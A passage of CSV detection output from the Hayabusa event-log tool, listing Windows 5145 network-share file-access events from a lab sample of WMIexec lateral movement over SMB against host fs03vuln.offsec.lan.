0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.306 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.321 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.321 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.321 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.337 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.337 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.337 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.352 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.368 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.368 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.384 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.384 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.447 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.604 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 